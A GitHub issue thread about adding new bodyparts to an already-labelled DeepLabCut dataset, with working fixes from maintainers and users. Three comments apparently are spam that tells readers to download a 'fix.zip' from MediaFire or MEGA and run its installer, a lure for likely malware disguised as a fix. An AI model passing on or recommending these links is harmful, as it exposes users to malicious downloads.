### ISSUE TITLE
cannot add new labels to a labelled dataset

### ISSUE THREAD

**Issue by ashwin-miriyala** [DeepLabCut/DeepLabCut#2723]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Bug description

I have an already labelled dataset.  I wanted to add additional bodyparts, so i appended these bodyparts to the config.yaml file under the bodyparts section.  However, when I run deeplabcut.label_frames(config_path), my new bodyparts are not showing in the list.  

Checking the config.yaml file through the gui shows that the bodyparts are indeed listed in the config file, but they're not showing up while labelling. 

### Operating System

Ubuntu 20.04

### DeepLabCut version

dlc version 3.0.0rc3

### DeepLabCut mode

single animal

### Device type

gpu

### Steps To Reproduce

append bodyparts to config file and run label_frames

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://github.com/DeepLabCut/DeepLabCut/blob/master/CODE_OF_CONDUCT.md)

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by JulianAlvarezdeGiorgi** [comment]
Hello, I had the same need while ago.

I had originally created a dataset with 14 body parts. Later I decided to make another project, where I kept the body parts of the previous project (these 14) but added new body parts. As I already had many frames with the 14 labels, I wanted to be able to transfer them to the new project, and only have to label the new body parts. For this, I created a new project, with all the body parts I was interested in (old and new), I kept the `labeled-data` folder of the old project, and I created a function called `adapt_labeled_data_to_new_project`  to add the new body parts to the .csv and .h5 files, so I could label the new bodyparts from the GUI.

Please review the function implemented in `deeplabcut/utils/conversioncode.py` within the main repository. To use it, create a new project with all the desired body parts, copy and paste the `labeled-data` folder, and then run the function. It's crucial to keep the same names for the body parts that you have already labeled.

**Comment by n-poulsen** [comment]
Hi @ashwin-miriyala - to be able to label the new keypoint, you need to drag-and-drop your project's `config.yaml` file (with the added keypoint(s)) into the GUI. It will ask you "Do you want to display the new keypoints only", to which you should reply **"No"**.

**This is important - answering "No" means you want to keep your existing annotated data, and simply add new bodyparts.**

You only need to do this step the first time you open the folder for a video (when the keypoints in the GUI don't match the ones in your project's `config.yaml` file). 

Short example:

https://github.com/user-attachments/assets/4ccc194a-99c9-4a6f-a27a-f9003bfd652e

**Comment by ashwin-miriyala** [comment]
Thanks! I didn't find this in the documents, but it works now that I've tried it.

Thanks!

Ashwin
________________________________

**Comment by sdhers** [comment]
Hello! Should I follow the same strategy to remove keypoints that I dont want to use for training my new model?
